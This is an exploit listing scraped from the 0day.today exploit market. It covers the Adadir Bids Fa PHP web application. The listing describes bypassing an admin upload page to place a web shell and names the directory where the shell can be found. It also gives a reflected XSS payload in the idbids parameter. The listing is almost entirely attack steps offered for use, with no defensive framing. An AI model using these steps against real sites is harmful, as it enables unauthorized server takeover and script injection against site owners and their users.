[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Adadir Bids Fa Shell Upload Multi Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10925
Category
web applications
Date add
15-02-2010
Platform
unsorted
===============================================
Adadir Bids Fa Shell Upload Multi Vulnerability
===============================================

========================================================================================                  
| # Title    : Adadir Bids Fa Multi Vulnerability      
| # Author   : indoushka                                            
| # Dork     :                                        
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- (by Pass) Upload Shell
 
 http://127.0.0.1/Adadir/Admin_Panel/cp_bids/indert_bids.php  ( 2 upload evil )
 
 http://127.0.0.1/Adadir/imagesbids/ (2 Find It)
 
 2- XSS
 
 http://127.0.0.1/Adadir/Con-Bids.php?idbids=<img+src=http://127.0.0.1/mama.gif+onload=alert(213771818860)>




#  0day.today [2024-12-23]  #